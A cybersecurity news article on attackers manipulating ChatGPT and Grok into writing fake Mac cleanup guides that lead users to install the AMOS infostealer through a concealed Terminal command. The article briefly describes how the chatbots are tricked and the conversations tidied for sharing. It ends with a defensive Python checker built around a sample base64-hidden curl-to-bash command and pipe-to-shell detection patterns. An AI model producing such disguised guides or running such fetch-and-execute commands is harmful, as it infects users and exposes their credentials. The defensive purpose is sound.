Hackers turn ChatGPT, Grok chat links into malware traps on search engines


Cybercriminals are flooding search results with manipulated ChatGPT or Grok answers. Users trying to clean their Macs or free up space end up installing powerful infostealer malware.

Security researchers are raising alarms about a new malware delivery campaign that spreads through shared, manipulated AI-generated tech tips. Attackers buy sponsored results on Google to appear in the search results page for a typo.

The links lead to ChatGPT or Grok conversations with guides, which resemble genuine tips to resolve the user’s problem. For example, if the user searched how to “clear system data on iMac,” the first search result would suggest a ChatGPT conversation containing fake guidance.

“Two highly ranked results appeared near the top of the page,” reported researchers at Huntress, a cybersecurity firm.

One of the Google search results to this specific query led to a ChatGPT conversation titled “How to delete system data on Mac – How to clear storage on Mac?” Another sponsored result was a Grok conversation “How to clear storage on Mac? – Guide Clear Space – Clear space safely.”

[Image: search results. Image by Huntress.]

If the user follows the advice on the legitimate platform, they will get infected with Atomic macOS Stealer (AMOS), a powerful infostealing malware.

The researchers identified multiple other variations of malicious instructions hosted on Grok and ChatGPT – all of which instruct users to run various versions of a command on the terminal that fetches and executes malware on their systems.

This attack vector is a variation of the ClickFix social engineering technique, which exploits users' impulse to resolve minor technical issues and tricks them into installing malware themselves.

How does this attack work?

Hackers base the whole chain of attack on legitimate vendors, and this social engineering attack is indistinguishable from the legitimate help it impersonates.

“No warnings. No downloads. No red flags. The entire infection chain appears to be normal and safe behavior, because it is in every other context. Users aren’t being careless. They're not ignoring security prompts,” Huntress researchers said.

“They're following instructions from a trusted AI platform, delivered through a search engine they use daily, for a task that legitimately requires Terminal access.”

First, hackers trick ChatGPT into generating a malicious step-by-step guide for cleaning a computer, installing an app or a feature, or resolving any other issue that users frequently encounter.

Cybercriminals use the “prompt engineering” technique to trick the chatbot into generating a fake guide with their malicious instructions. Hackers then clean up the conversation to remove lengthy back-and-forth and other signs of manipulation, making the guide appear concise and tidy.

[Image: manipulated ChatGPT guide. Image by Huntress.]

“Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there,” Malwarebytes explains in its blog post.

Chatbots also have sharing features, so hackers simply create links to these manipulated conversations. They pay for sponsored search results and employ other SEO poisoning techniques to ensure their posts appear high in search results.

The base64-encoded string in the ChatGPT-provided terminal command conceals the attacker-controlled website address hosting the malicious script.

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning,” Huntress researchers explain.

When a Mac user pastes commands into the terminal, they will bypass Gatekeeper, a built-in protection that normally blocks malicious code from running.

According to Trend Micro researchers, AMOS infostealer is capable of stealing credentials, browser data, cryptocurrency wallets, Telegram chats, VPN profiles, keychain items, Apple Notes, and files from common folders.

“For business, this creates downstream risks, such as credential stuffing, financial theft, or further intrusions into enterprise systems,” Trend Micro said.

How to protect yourself?

An adblocker would prevent users from seeing the sponsored search results in the first place. If you don’t use one, don’t click on sponsored search results.

“We have seen so many cases where sponsored results lead to malware that we recommend skipping them or making sure you never see them,” Malwarebytes said.

[Image: ClickFix phishing attack. Image by Cybernews.]

If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.

Another piece of advice is to never run copy-pasted terminal commands from random pages or forums if you don’t understand their contents, especially when those contents are intentionally concealed, such as by using base64 encoding.
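
A concealed command can be inspected without running it. The Python sketch below is an added example, not code from Huntress, Malwarebytes or Cybernews: it statically reviews a pasted one-liner, decodes any base64-looking strings and reports what they hide. The sample command, the example.invalid URL and all function names are constructed for illustration.

```python
import base64
import binascii
import re

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")   # long base64-looking runs
DECODE_CALL = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
FETCH_CALL = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|k)?sh\b")


def decode_hidden_strings(command):
    """Decode base64-looking tokens to text. Nothing is fetched or executed."""
    decoded = []
    for token in B64_TOKEN.findall(command):
        padded = token + "=" * (-len(token) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not text
        if text.isprintable():
            decoded.append(text)
    return decoded


def review_command(command):
    """Static review of a pasted one-liner before it reaches a shell."""
    hidden_urls = [s for s in decode_hidden_strings(command)
                   if re.match(r"https?://", s, re.IGNORECASE)]
    findings = []
    if hidden_urls:
        findings.append("base64 string decodes to a URL")
    if DECODE_CALL.search(command):
        findings.append("decodes base64 at run time")
    if FETCH_CALL.search(command):
        findings.append("downloads remote content")
    if PIPE_TO_SHELL.search(command):
        findings.append("pipes output into a shell")
    return {"hidden_urls": hidden_urls, "findings": findings,
            "suspicious": bool(hidden_urls) or len(findings) >= 2}


# Constructed sample (not the campaign's command): a reserved .invalid URL is
# encoded here so the concealed form can be inspected safely.
SAMPLE_URL = "https://example.invalid/cleanup.sh"
ENCODED = base64.b64encode(SAMPLE_URL.encode()).decode()
SAMPLE_COMMAND = f'curl -fsSL "$(echo {ENCODED} | base64 -d)" | bash'

if __name__ == "__main__":
    for cmd in (SAMPLE_COMMAND, "du -sh ~/Library/Caches"):
        print(cmd, "->", review_command(cmd))
```

Any command the review marks as suspicious deserves a read of the decoded strings before it goes anywhere near a terminal; an unflagged result only means no concealment was found, not that the command is safe.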

Researchers also suggest using strong endpoint protection software. However, this might not be enough.

“The most dangerous exploits don't target code; they target behavior and people,” Huntress concluded.

